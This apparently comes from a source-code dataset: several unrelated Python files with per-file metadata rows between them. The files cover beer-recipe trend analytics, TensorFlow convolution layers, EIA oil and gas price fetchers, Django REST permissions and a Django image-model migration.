top_scope = top_scope[top_scope['month'] >= months_ago(top_months).strftime('%Y-%m-%d')]
top_ids = top_scope.groupby('kind_id')['recipes'].sum().sort_values(ascending=False).index.values[:num_top]
per_month = per_month[per_month['kind_id'].isin(top_ids)]
recipes_per_month = RecipesCountAnalysis(self.scope).per_month()
per_month = per_month.merge(recipes_per_month, on="month")
per_month['recipes_percent'] = per_month['recipes'] / per_month['total_recipes']
# Rolling average
smoothened = RollingAverage().rolling_multiple_series(per_month, 'kind_id', 'month')
smoothened['recipes_percent'] = smoothened['recipes_percent'].apply(lambda x: max([x, 0]))
# Start date for popularity charts
smoothened = smoothened[smoothened['month'] >= POPULARITY_START_MONTH]
# Sort by top kinds
if top_ids is not None:
smoothened['kind_id'] = pd.Categorical(smoothened['kind_id'], top_ids)
smoothened = smoothened.sort_values(['kind_id', 'month'])
smoothened['yeast'] = smoothened['kind_id'].map(get_yeast_names_dict())
return smoothened
class RecipesMetricHistogram(RecipeLevelAnalysis):
def metric_histogram(self, metric: str) -> DataFrame:
precision = METRIC_PRECISION[metric] if metric in METRIC_PRECISION else METRIC_PRECISION['default']
scope_filter = self.scope.get_filter()
query = '''
SELECT round({}, {}) as {}
FROM recipe_db_recipe AS r
WHERE
{} IS NOT NULL
{}
'''.format(metric, precision, metric, metric, scope_filter.where)
df = pd.read_sql(query, connection, params=scope_filter.parameters)
df = remove_outliers(df, metric, 0.02)
if len(df) == 0:
return df
bins = 16
if metric in ['og', 'fg'] and len(df) > 0:
abs = df[metric].max() - df[metric].min()
bins = max([1, round(abs / 0.002)])
if bins > 18:
bins = round(bins / math.ceil(bins / 12))
if metric in ['abv', 'srm'] and len(df) > 0:
abs = df[metric].max() - df[metric].min()
bins = max([1, round(abs / 0.1)])
if bins > 18:
bins = round(bins / math.ceil(bins / 12))
if metric in ['ibu'] and len(df) > 0:
abs = df[metric].max() - df[metric].min()
bins = max([1, round(abs)])
if bins > 18:
bins = round(bins / math.ceil(bins / 12))
histogram = df.groupby([pd.cut(df[metric], bins, precision=precision)])[metric].agg(['count'])
histogram = histogram.reset_index()
histogram[metric] = histogram[metric].map(str)
return histogram
class RecipesTrendAnalysis(RecipeLevelAnalysis):
def _recipes_per_month_in_scope(self) -> DataFrame:
return RecipesCountAnalysis(self.scope).per_month()
def trending_styles(self, trend_window_months: int = 24) -> DataFrame:
recipes_per_month = self._recipes_per_month_in_scope()
scope_filter = self.scope.get_filter()
query = '''
SELECT
date(r.created, 'start of month') AS month,
ras.style_id,
count(r.uid) AS recipes
FROM recipe_db_recipe AS r
JOIN recipe_db_recipe_associated_styles AS ras
ON r.uid = ras.recipe_id
WHERE
r.created >= %s -- Cut-off date for popularity charts
{}
GROUP BY month, ras.style_id
'''.format(scope_filter.where)
per_month = pd.read_sql(query, connection, params=[POPULARITY_CUT_OFF_DATE] + scope_filter.parameters)
if len(per_month) == 0:
return per_month
per_month = per_month.merge(recipes_per_month, on="month")
per_month['month'] = pd.to_datetime(per_month['month'])
per_month['recipes_percent'] = per_month['recipes'] / per_month['total_recipes']
trend_filter = Trending(RollingAverage(window=trend_window_months + 1), trending_window=trend_window_months)
trending_ids = trend_filter.get_trending_series(per_month, 'style_id', 'month', 'recipes_percent', 'recipes')
# Filter trending series
trending = per_month[per_month['style_id'].isin(trending_ids)]
if len(trending) == 0:
return trending
# Rolling average
smoothened = RollingAverage().rolling_multiple_series(trending, 'style_id', 'month')
smoothened['recipes_percent'] = smoothened['recipes_percent'].apply(lambda x: max([x, 0]))
# Start date for popularity charts
smoothened = smoothened[smoothened['month'] >= POPULARITY_START_MONTH]
# Order by relevance
smoothened['style_id'] = pd.Categorical(smoothened['style_id'], trending_ids)
smoothened = smoothened.sort_values(['style_id', 'month'])
smoothened['beer_style'] = smoothened['style_id'].map(get_style_names_dict())
return smoothened
def trending_hops(self, projection: Optional[HopProjection] = None, trend_window_months: int = 24) -> DataFrame:
projection = projection or HopProjection()
recipes_per_month = self._recipes_per_month_in_scope()
scope_filter = self.scope.get_filter()
projection_filter = projection.get_filter()
query = '''
SELECT
date(r.created, 'start of month') AS month,
rh.kind_id,
count(DISTINCT r.uid) AS recipes
FROM recipe_db_recipe AS r
JOIN recipe_db_recipehop AS rh
ON r.uid = rh.recipe_id
WHERE
r.created >= %s -- Cut-off date for popularity charts
AND rh.kind_id IS NOT NULL
{}
{}
GROUP BY date(r.created, 'start of month'), rh.kind_id
'''.format(scope_filter.where, projection_filter.where)
per_month = pd.read_sql(query, connection, params=[POPULARITY_CUT_OFF_DATE] + scope_filter.parameters + projection_filter.parameters)
if len(per_month) == 0:
return per_month
per_month = per_month.merge(recipes_per_month, on="month")
per_month['month'] = pd.to_datetime(per_month['month'])
per_month['recipes_percent'] = per_month['recipes'] / per_month['total_recipes']
trend_filter = Trending(RollingAverage(window=trend_window_months+1), trending_window=trend_window_months)
trending_ids = trend_filter.get_trending_series(per_month, 'kind_id', 'month', 'recipes_percent', 'recipes')
# Filter trending series
trending = per_month[per_month['kind_id'].isin(trending_ids)]
if len(trending) == 0:
return trending
# Rolling average
smoothened = RollingAverage().rolling_multiple_series(trending, 'kind_id', 'month')
smoothened['recipes_percent'] = smoothened['recipes_percent'].apply(lambda x: max([x, 0]))
# Start date for popularity charts
smoothened = smoothened[smoothened['month'] >= POPULARITY_START_MONTH]
# Order by relevance
smoothened['kind_id'] = pd.Categorical(smoothened['kind_id'], trending_ids)
smoothened = smoothened.sort_values(['kind_id', 'month'])
smoothened['hop'] = smoothened['kind_id'].map(get_hop_names_dict())
return smoothened
def trending_yeasts(self, projection: Optional[YeastProjection] = None, trend_window_months: int = 24) -> DataFrame:
projection = projection or YeastProjection()
recipes_per_month = self._recipes_per_month_in_scope()
scope_filter = self.scope.get_filter()
projection_filter = projection.get_filter()
query = '''
SELECT
date(r.created, 'start of month') AS month,
ry.kind_id,
count(DISTINCT r.uid) AS recipes
FROM recipe_db_recipe AS r
JOIN recipe_db_recipeyeast AS ry
ON r.uid = ry.recipe_id
WHERE
r.created >= %s -- Cut-off date for popularity charts
AND ry.kind_id IS NOT NULL
{}
{}
GROUP BY date(r.created, 'start of month'), ry.kind_id
'''.format(scope_filter.where, projection_filter.where)
per_month = pd.read_sql(query, connection, params=[POPULARITY_CUT_OFF_DATE] + scope_filter.parameters + projection_filter.parameters)
if len(per_month) == 0:
return per_month
per_month = per_month.merge(recipes_per_month, on="month")
per_month['month'] = pd.to_datetime(per_month['month'])
per_month['recipes_percent'] = per_month['recipes'] / per_month['total_recipes']
trend_filter = Trending(RollingAverage(window=trend_window_months+1), trending_window=trend_window_months)
trending_ids = trend_filter.get_trending_series(per_month, 'kind_id', 'month', 'recipes_percent', 'recipes')
# Filter trending series
trending = per_month[per_month['kind_id'].isin(trending_ids)]
if len(trending) == 0:
return trending
# Rolling average
smoothened = RollingAverage().rolling_multiple_series(trending, 'kind_id', 'month')
smoothened['recipes_percent'] = smoothened['recipes_percent'].apply(lambda x: max([x, 0]))
# Start date for popularity charts
smoothened = smoothened[smoothened['month'] >= POPULARITY_START_MONTH]
# Order by relevance
smoothened['kind_id'] = pd.Categorical(smoothened['kind_id'], trending_ids)
smoothened = smoothened.sort_values(['kind_id', 'month'])
smoothened['yeast'] = smoothened['kind_id'].map(get_yeast_names_dict())
return smoothened
class CommonStylesAnalysis(RecipeLevelAnalysis):
def common_styles_absolute(self, num_top: Optional[int] = None) -> DataFrame:
df = self._common_styles_data()
if len(df) == 0:
return df
df = df.sort_values('recipes', ascending=False)
return self._return(df, num_top)
def common_styles_relative(self, num_top: Optional[int] = None) -> DataFrame:
df = self._common_styles_data()
if len(df) == 0:
return df
# Calculate percent
recipes_per_style = RecipesCountAnalysis(RecipeScope()).per_style()
df = df.merge(recipes_per_style, on="style_id")
df['recipes_percent'] = df['recipes'] / df['total_recipes']
df = df.sort_values('recipes_percent', ascending=False)
return self._return(df, num_top)
def _common_styles_data(self) -> DataFrame:
scope_filter = self.scope.get_filter()
query = '''
SELECT
ras.style_id,
count(DISTINCT r.uid) AS recipes
FROM recipe_db_recipe AS r
JOIN recipe_db_recipe_associated_styles AS ras
ON r.uid = ras.recipe_id
WHERE
1 {}
GROUP BY ras.style_id
'''.format(scope_filter.where)
return pd.read_sql(query, connection, params=scope_filter.parameters)
def _return(self, df: DataFrame, num_top: Optional[int]) -> DataFrame:
df['beer_style'] = df['style_id'].map(get_style_names_dict())
if num_top is not None:
df = df[:num_top]
return df
| 41.346416
| 141
| 0.602873
| 2,823
| 24,229
| 4.927382
| 0.063762
| 0.066139
| 0.03271
| 0.028756
| 0.848814
| 0.824587
| 0.817757
| 0.799641
| 0.784975
| 0.781308
| 0
| 0.003747
| 0.29506
| 24,229
| 585
| 142
| 41.417094
| 0.810656
| 0.026043
| 0
| 0.762222
| 0
| 0
| 0.301129
| 0.008698
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042222
| false
| 0
| 0.022222
| 0.002222
| 0.153333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
331a38ef31232051f3a753535ea1e32defc82bec
| 107
|
py
|
Python
|
Tichu-gym/scraper/__ini__.py
|
lukaspestalozzi/Master_Semester_Project
|
4e71d4034ae3f5e7efa0864b48c6fd4d876fef4e
|
[
"MIT"
] | null | null | null |
Tichu-gym/scraper/__ini__.py
|
lukaspestalozzi/Master_Semester_Project
|
4e71d4034ae3f5e7efa0864b48c6fd4d876fef4e
|
[
"MIT"
] | null | null | null |
Tichu-gym/scraper/__ini__.py
|
lukaspestalozzi/Master_Semester_Project
|
4e71d4034ae3f5e7efa0864b48c6fd4d876fef4e
|
[
"MIT"
] | null | null | null |
from .tichumania_game_scraper import GenCombWeights
from .tichumania_game_scraper import TichumaniaScraper
| 35.666667
| 54
| 0.906542
| 12
| 107
| 7.75
| 0.583333
| 0.301075
| 0.387097
| 0.537634
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074766
| 107
| 3
| 54
| 35.666667
| 0.939394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
6828319ea4f9fa70a64cc1568049c21ebc548783
| 7,843
|
py
|
Python
|
tflib/layers.py
|
AfricaMachineIntelligence/ConvNetQuake
|
6fea487ce0031d31cc64ad14f9ffc6a0b088a723
|
[
"MIT"
] | 162
|
2017-02-10T20:13:57.000Z
|
2022-03-06T12:50:50.000Z
|
tflib/layers.py
|
VioletaSeo/ConvNetQuake
|
9d8bb6d41e5e3185edf3a3fc716539b910e17cfe
|
[
"MIT"
] | 15
|
2017-05-25T03:58:35.000Z
|
2020-03-12T18:39:10.000Z
|
tflib/layers.py
|
VioletaSeo/ConvNetQuake
|
9d8bb6d41e5e3185edf3a3fc716539b910e17cfe
|
[
"MIT"
] | 108
|
2017-05-25T03:19:51.000Z
|
2022-03-18T02:07:09.000Z
|
import tensorflow as tf
import numpy as np
def conv(inputs,
nfilters,
ksize,
stride=1,
padding='SAME',
use_bias=True,
activation_fn=tf.nn.relu,
initializer=tf.contrib.layers.variance_scaling_initializer(),
regularizer=None,
scope=None,
reuse=None):
with tf.variable_scope(scope, reuse=reuse):
n_in = inputs.get_shape().as_list()[-1]
weights = tf.get_variable(
'weights',
shape=[ksize, ksize, n_in, nfilters],
dtype=inputs.dtype.base_dtype,
initializer=initializer,
collections=[tf.GraphKeys.WEIGHTS, tf.GraphKeys.VARIABLES],
regularizer=regularizer)
strides = [1, stride, stride, 1]
current_layer = tf.nn.conv2d(inputs, weights, strides, padding=padding)
if use_bias:
biases = tf.get_variable(
'biases',
shape=[nfilters,],
dtype=inputs.dtype.base_dtype,
initializer=tf.constant_initializer(0.0),
collections=[tf.GraphKeys.BIASES, tf.GraphKeys.VARIABLES])
current_layer = tf.nn.bias_add(current_layer, biases)
if activation_fn is not None:
current_layer = activation_fn(current_layer)
return current_layer
def transpose_conv(inputs,
nfilters,
ksize,
stride=1,
padding='SAME',
use_bias=True,
activation_fn=tf.nn.relu,
initializer=tf.contrib.layers.variance_scaling_initializer(),
regularizer=None,
scope=None,
reuse=None):
with tf.variable_scope(scope, reuse=reuse):
n_in = inputs.get_shape().as_list()[-1]
weights = tf.get_variable(
'weights',
shape=[ksize, ksize, n_in, nfilters],
dtype=inputs.dtype.base_dtype,
initializer=initializer,
collections=[tf.GraphKeys.WEIGHTS, tf.GraphKeys.VARIABLES],
regularizer=regularizer)
bs, h, w, c = inputs.get_shape().as_list()
strides = [1, stride, stride, 1]
out_shape = [bs, stride*h, stride*w, c]
current_layer = tf.nn.conv2d_transpose(inputs, weights, out_shape, strides, padding=padding)
if use_bias:
biases = tf.get_variable(
'biases',
shape=[nfilters,],
dtype=inputs.dtype.base_dtype,
initializer=tf.constant_initializer(0.0),
collections=[tf.GraphKeys.BIASES, tf.GraphKeys.VARIABLES])
current_layer = tf.nn.bias_add(current_layer, biases)
if activation_fn is not None:
current_layer = activation_fn(current_layer)
return current_layer
def conv1(inputs,
nfilters,
ksize,
stride=1,
padding='SAME',
use_bias=True,
activation_fn=tf.nn.relu,
initializer=tf.contrib.layers.variance_scaling_initializer(),
regularizer=None,
scope=None,
reuse=None):
with tf.variable_scope(scope, reuse=reuse):
n_in = inputs.get_shape().as_list()[-1]
weights = tf.get_variable(
'weights',
shape=[ksize, n_in, nfilters],
dtype=inputs.dtype.base_dtype,
initializer=initializer,
collections=[tf.GraphKeys.WEIGHTS, tf.GraphKeys.VARIABLES],
regularizer=regularizer)
current_layer = tf.nn.conv1d(inputs, weights, stride, padding=padding)
if use_bias:
biases = tf.get_variable(
'biases',
shape=[nfilters,],
dtype=inputs.dtype.base_dtype,
initializer=tf.constant_initializer(0.0),
collections=[tf.GraphKeys.BIASES, tf.GraphKeys.VARIABLES])
current_layer = tf.nn.bias_add(current_layer, biases)
if activation_fn is not None:
current_layer = activation_fn(current_layer)
return current_layer
def atrous_conv1d(inputs,
nfilters,
ksize,
rate=1,
padding='SAME',
use_bias=True,
activation_fn=tf.nn.relu,
initializer=tf.contrib.layers.variance_scaling_initializer(),
regularizer=None,
scope=None,
reuse=None):
""" Use tf.nn.atrous_conv2d and adapt to 1d"""
with tf.variable_scope(scope, reuse=reuse):
# from (bs,width,c) to (bs,width,1,c)
inputs = tf.expand_dims(inputs,2)
n_in = inputs.get_shape().as_list()[-1]
weights = tf.get_variable(
'weights',
shape=[ksize, 1, n_in, nfilters],
dtype=inputs.dtype.base_dtype,
initializer=initializer,
collections=[tf.GraphKeys.WEIGHTS, tf.GraphKeys.VARIABLES],
regularizer=regularizer)
current_layer = tf.nn.atrous_conv2d(inputs,weights, rate, padding=padding)
# Resize into (bs,width,c)
current_layer = tf.squeeze(current_layer,squeeze_dims=[2])
if use_bias:
biases = tf.get_variable(
'biases',
shape=[nfilters,],
dtype=inputs.dtype.base_dtype,
initializer=tf.constant_initializer(0.0),
collections=[tf.GraphKeys.BIASES, tf.GraphKeys.VARIABLES])
current_layer = tf.nn.bias_add(current_layer, biases)
if activation_fn is not None:
current_layer = activation_fn(current_layer)
return current_layer
def conv3(inputs,
nfilters,
ksize,
stride=1,
padding='SAME',
use_bias=True,
activation_fn=tf.nn.relu,
initializer=tf.contrib.layers.variance_scaling_initializer(),
regularizer=None,
scope=None,
reuse=None):
with tf.variable_scope(scope, reuse=reuse):
n_in = inputs.get_shape().as_list()[-1]
weights = tf.get_variable(
'weights',
shape=[ksize, ksize, ksize, n_in, nfilters],
dtype=inputs.dtype.base_dtype,
initializer=initializer,
collections=[tf.GraphKeys.WEIGHTS, tf.GraphKeys.VARIABLES],
regularizer=regularizer)
strides = [1, stride, stride, stride, 1]
current_layer = tf.nn.conv3d(inputs, weights, strides, padding=padding)
if use_bias:
biases = tf.get_variable(
'biases',
shape=[nfilters,],
dtype=inputs.dtype.base_dtype,
initializer=tf.constant_initializer(0.0),
collections=[tf.GraphKeys.BIASES, tf.GraphKeys.VARIABLES])
current_layer = tf.nn.bias_add(current_layer, biases)
if activation_fn is not None:
current_layer = activation_fn(current_layer)
return current_layer
def fc(inputs, nfilters, use_bias=True, activation_fn=tf.nn.relu,
initializer=tf.contrib.layers.variance_scaling_initializer(),
regularizer=None, scope=None, reuse=None):
with tf.variable_scope(scope, reuse=reuse):
n_in = inputs.get_shape().as_list()[-1]
weights = tf.get_variable(
'weights',
shape=[n_in, nfilters],
dtype=inputs.dtype.base_dtype,
initializer=initializer,
regularizer=regularizer)
current_layer = tf.matmul(inputs, weights)
if use_bias:
biases = tf.get_variable(
'biases',
shape=[nfilters,],
dtype=inputs.dtype.base_dtype,
initializer=tf.constant_initializer(0))
current_layer = tf.nn.bias_add(current_layer, biases)
if activation_fn is not None:
current_layer = activation_fn(current_layer)
return current_layer
def batch_norm(inputs, center=False, scale=False,
decay=0.999, epsilon=0.001, reuse=None,
scope=None, is_training=False):
return tf.contrib.layers.batch_norm(
inputs, center=center, scale=scale,
decay=decay, epsilon=epsilon, activation_fn=None,
reuse=reuse,trainable=False, scope=scope, is_training=is_training)
relu = tf.nn.relu
def crop_like(inputs, like, name=None):
with tf.name_scope(name):
_, h, w, _ = inputs.get_shape().as_list()
_, new_h, new_w, _ = like.get_shape().as_list()
crop_h = (h-new_h)/2
crop_w = (w-new_w)/2
cropped = inputs[:, crop_h:crop_h+new_h, crop_w:crop_w+new_w, :]
return cropped
| 31.497992
| 96
| 0.648604
| 972
| 7,843
| 5.04321
| 0.100823
| 0.093023
| 0.037128
| 0.058752
| 0.834965
| 0.809466
| 0.809466
| 0.79437
| 0.79437
| 0.79437
| 0
| 0.008693
| 0.237282
| 7,843
| 248
| 97
| 31.625
| 0.810766
| 0.012878
| 0
| 0.797101
| 0
| 0
| 0.012671
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038647
| false
| 0
| 0.009662
| 0.004831
| 0.086957
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
682a9211740ca279ca736263e93bb35ab681ebde
| 160
|
py
|
Python
|
bindings/pydeck/tests/bindings/test_string.py
|
StijnAmeloot/deck.gl
|
d67688e3f71a37e2f021dde6681bb1516bebac2b
|
[
"MIT"
] | 7,702
|
2016-04-19T15:56:09.000Z
|
2020-04-14T19:03:13.000Z
|
bindings/pydeck/tests/bindings/test_string.py
|
StijnAmeloot/deck.gl
|
d67688e3f71a37e2f021dde6681bb1516bebac2b
|
[
"MIT"
] | 3,126
|
2016-04-20T23:04:42.000Z
|
2020-04-14T22:46:02.000Z
|
bindings/pydeck/tests/bindings/test_string.py
|
StijnAmeloot/deck.gl
|
d67688e3f71a37e2f021dde6681bb1516bebac2b
|
[
"MIT"
] | 1,526
|
2016-05-07T06:55:07.000Z
|
2020-04-14T18:52:19.000Z
|
from pydeck.types import String
def test_basic_case():
assert "ok" == String("ok")
def test_quotes():
assert "`ok`" == String("ok", quote_type="`")
| 16
| 49
| 0.63125
| 22
| 160
| 4.409091
| 0.636364
| 0.14433
| 0.28866
| 0.329897
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.18125
| 160
| 9
| 50
| 17.777778
| 0.740458
| 0
| 0
| 0
| 0
| 0
| 0.06875
| 0
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0.4
| true
| 0
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
6832dbb97483a8501a3853a6b59861e16112abba
| 1,360
|
py
|
Python
|
pytroleum/eia.py
|
WaltXon/pytroleum
|
c8b1f53d2d276ebb6bc04834dd4e3f7989421535
|
[
"MIT"
] | 12
|
2019-05-10T16:37:22.000Z
|
2022-01-30T02:02:14.000Z
|
pytroleum/eia.py
|
WaltXon/pytroleum
|
c8b1f53d2d276ebb6bc04834dd4e3f7989421535
|
[
"MIT"
] | null | null | null |
pytroleum/eia.py
|
WaltXon/pytroleum
|
c8b1f53d2d276ebb6bc04834dd4e3f7989421535
|
[
"MIT"
] | 2
|
2020-01-17T08:53:34.000Z
|
2021-02-17T03:51:48.000Z
|
import requests
import pprint
api_key = ""
def get_eia_wti_monthly(
addr=r"http://api.eia.gov/series/",
data={"api_key": api_key, "series_id": "PET.RWTC.M"},
):
r = requests.get(addr, params=data)
rdict = r.json()["series"][0]
data = rdict["data"]
del rdict["data"]
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(rdict)
return data
def get_eia_wti_annual(
addr=r"http://api.eia.gov/series/",
data={"api_key": api_key, "series_id": "PET.RWTC.A"},
):
r = requests.get(addr, params=data)
rdict = r.json()["series"][0]
data = rdict["data"]
del rdict["data"]
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(rdict)
return data
def get_eia_henryhub_monthly(
addr=r"http://api.eia.gov/series/",
data={"api_key": api_key, "series_id": "NG.RNGWHHD.M"},
):
r = requests.get(addr, params=data)
rdict = r.json()["series"][0]
data = rdict["data"]
del rdict["data"]
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(rdict)
return data
def get_eia_henryhub_annual(
addr=r"http://api.eia.gov/series/",
data={"api_key": api_key, "series_id": "NG.RNGWHHD.A"},
):
r = requests.get(addr, params=data)
rdict = r.json()["series"][0]
data = rdict["data"]
del rdict["data"]
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(rdict)
return data
| 23.859649
| 59
| 0.621324
| 202
| 1,360
| 4.059406
| 0.173267
| 0.065854
| 0.043902
| 0.058537
| 0.942683
| 0.942683
| 0.942683
| 0.942683
| 0.942683
| 0.942683
| 0
| 0.007299
| 0.194118
| 1,360
| 56
| 60
| 24.285714
| 0.740876
| 0
| 0
| 0.765957
| 0
| 0
| 0.197059
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.085106
| false
| 0
| 0.042553
| 0
| 0.212766
| 0.191489
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6834b31c00919653038fcba1137dbd610987f7d3
| 835
|
py
|
Python
|
api/permissions.py
|
Rybakov-Ilay/yamdb_final
|
9ab43ef36d626a255b9f83fff8d4a972f920b859
|
[
"MIT"
] | null | null | null |
api/permissions.py
|
Rybakov-Ilay/yamdb_final
|
9ab43ef36d626a255b9f83fff8d4a972f920b859
|
[
"MIT"
] | null | null | null |
api/permissions.py
|
Rybakov-Ilay/yamdb_final
|
9ab43ef36d626a255b9f83fff8d4a972f920b859
|
[
"MIT"
] | null | null | null |
from rest_framework import permissions
from rest_framework.permissions import SAFE_METHODS
class ReadOnly(permissions.BasePermission):
def has_permission(self, request, view):
return request.method in SAFE_METHODS
def has_object_permission(self, request, view, obj):
return request.method in SAFE_METHODS
class IsModerator(permissions.BasePermission):
def has_permission(self, request, view):
return request.user.is_authenticated and request.user.is_moderator
def has_object_permission(self, request, view, obj):
return request.user.is_moderator
class IsOwner(permissions.BasePermission):
def has_permission(self, request, view):
return request.user.is_authenticated
def has_object_permission(self, request, view, obj):
return request.user == obj.author
| 30.925926
| 74
| 0.758084
| 103
| 835
| 5.970874
| 0.281553
| 0.058537
| 0.204878
| 0.243902
| 0.731707
| 0.731707
| 0.669919
| 0.669919
| 0.669919
| 0.669919
| 0
| 0
| 0.17006
| 835
| 26
| 75
| 32.115385
| 0.887446
| 0
| 0
| 0.470588
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.352941
| false
| 0
| 0.117647
| 0.352941
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
6882e51100c631b3587d7052da5ea91c939347b3
| 4,758
|
py
|
Python
|
biserici_inlemnite/app/migrations/0047_pozefundatie_pozestructuracatei_pozestructuracheotoare_pozestructuramixt_pozetiranti.py
|
ck-tm/biserici-inlemnite
|
c9d12127b92f25d3ab2fcc7b4c386419fe308a4e
|
[
"MIT"
] | null | null | null |
biserici_inlemnite/app/migrations/0047_pozefundatie_pozestructuracatei_pozestructuracheotoare_pozestructuramixt_pozetiranti.py
|
ck-tm/biserici-inlemnite
|
c9d12127b92f25d3ab2fcc7b4c386419fe308a4e
|
[
"MIT"
] | null | null | null |
biserici_inlemnite/app/migrations/0047_pozefundatie_pozestructuracatei_pozestructuracheotoare_pozestructuramixt_pozetiranti.py
|
ck-tm/biserici-inlemnite
|
c9d12127b92f25d3ab2fcc7b4c386419fe308a4e
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.13 on 2021-09-27 11:35
from django.db import migrations, models
import django.db.models.deletion
import modelcluster.fields
import wagtail.core.fields
class Migration(migrations.Migration):
dependencies = [
('wagtailimages', '0023_add_choose_permissions'),
('app', '0046_auto_20210927_1427'),
]
operations = [
migrations.CreateModel(
name='PozeTiranti',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('observatii', wagtail.core.fields.RichTextField(blank=True, null=True, verbose_name='Observații')),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='poze_tiranti', to='app.descrierepage')),
('poza', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.image')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='PozeStructuraMixt',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('observatii', wagtail.core.fields.RichTextField(blank=True, null=True, verbose_name='Observații')),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='poze_structura_mixt', to='app.descrierepage')),
('poza', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.image')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='PozeStructuraCheotoare',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('observatii', wagtail.core.fields.RichTextField(blank=True, null=True, verbose_name='Observații')),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='poze_structura_cheotoare', to='app.descrierepage')),
('poza', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.image')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='PozeStructuraCatei',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('observatii', wagtail.core.fields.RichTextField(blank=True, null=True, verbose_name='Observații')),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='poze_structura_catei', to='app.descrierepage')),
('poza', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.image')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='PozeFundatie',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('observatii', wagtail.core.fields.RichTextField(blank=True, null=True, verbose_name='Observații')),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='poze_fundatie', to='app.descrierepage')),
('poza', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.image')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
]
| 54.068182
| 168
| 0.606978
| 474
| 4,758
| 5.947257
| 0.172996
| 0.047889
| 0.054629
| 0.085846
| 0.85917
| 0.85917
| 0.85917
| 0.85917
| 0.85917
| 0.85917
| 0
| 0.010061
| 0.248003
| 4,758
| 87
| 169
| 54.689655
| 0.777809
| 0.009668
| 0
| 0.679012
| 1
| 0
| 0.161147
| 0.020382
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.049383
| 0
| 0.08642
